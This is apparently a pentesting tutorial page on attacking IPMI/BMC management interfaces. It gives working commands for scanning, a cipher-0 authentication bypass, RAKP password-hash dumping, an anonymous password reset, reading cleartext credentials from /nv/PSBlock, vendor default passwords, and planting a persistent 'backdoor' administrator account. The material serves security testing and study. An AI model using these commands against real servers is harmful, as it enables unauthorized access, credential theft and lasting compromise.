IPMI - Port 623/UDP/TCP
Last updated
Was this helpful?
Last updated
Was this helpful?
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
The Intelligent Platform Management Interface (IPMI) is a standardized protocol developed by Intel in 1998 to facilitate remote management and monitoring of computer systems, regardless of their operating state. IPMI operates independently of the system's CPU, firmware, and operating system, enabling administrators to perform tasks such as system monitoring, recovery, and maintenance even when the system is powered off or unresponsive. This functionality is primarily managed through the Baseboard Management Controller (BMC), a dedicated microcontroller embedded on the motherboard.
Default Ports: IPMI commonly utilizes UDP port 623 for network communication, though it can also operate over TCP.
Effective enumeration of IPMI services is crucial for identifying potential vulnerabilities. The following methodologies and tools are instrumental in this process:
Nmap can be employed to detect active IPMI services on a network:
nmap -n -p 623 <target-subnet>
nmap -n -sU -p 623 <target-subnet>These commands scan the specified subnet for hosts with UDP port 623 open, indicating the presence of IPMI services.
Determining the IPMI version can provide insights into potential vulnerabilities:
nmap -sU --script ipmi-version -p 623 <target-ip>Alternatively, the Metasploit auxiliary module can be utilized:
use auxiliary/scanner/ipmi/ipmi_versionSeveral vulnerabilities have been identified in IPMI implementations that could be exploited during penetration testing:
A critical flaw in IPMI 2.0 involves the use of cipher suite 0, which allows authentication bypass. Attackers can exploit this by specifying cipher 0 to gain unauthorized access:
ipmitool -I lanplus -C 0 -H <target-ip> -U <username> -P <password> user listThis command lists user accounts without proper authentication, highlighting the severity of the vulnerability.
The Remote Authenticated Key-Exchange Protocol (RAKP) in IPMI 2.0 contains a vulnerability that permits attackers to retrieve password hashes of valid users. These hashes can then be subjected to offline brute-force attacks to recover plaintext passwords. Metasploit provides a module to exploit this vulnerability:
use auxiliary/scanner/ipmi/ipmi_dumphashesSuccessful execution retrieves hashed credentials, emphasizing the need for robust password policies.
Some IPMI implementations allow anonymous authentication with null usernames and passwords. This misconfiguration can be exploited to perform unauthorized actions, such as resetting user passwords:
ipmitool -I lanplus -H <target-ip> -U '' -P '' user set password <user-id> <new-password>This command resets the password for the specified user ID without proper authentication.
Supermicro's IPMI implementation has been found to store administrator credentials in clear text within the BMC's filesystem, specifically in files like /nv/PSBlock. Attackers with access to the BMC can retrieve these credentials:
cat /nv/PSBlockThis practice poses significant security risks and underscores the importance of securing BMC access.
HP randomizes the default password for its Integrated Lights Out (iLO) product during manufacture. This practice contrasts with other manufacturers, who tend to use static default credentials. A summary of default usernames and passwords for various products is provided as follows:
HP Integrated Lights Out (iLO) uses a factory randomized 8-character string as its default password, showcasing a higher security level.
Products like Dell's iDRAC, IBM's IMM, and Fujitsu's Integrated Remote Management Controller use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
Similarly, Supermicro IPMI (2.0), Oracle/Sun ILOM, and ASUS iKVM BMC also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.
Upon compromising a host equipped with a BMC, the local BMC interface can be leveraged to insert a backdoor user account, creating a lasting presence on the server. This attack necessitates the presence of ipmitool on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.
bash
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATORLearn & practice For the Bug Bounty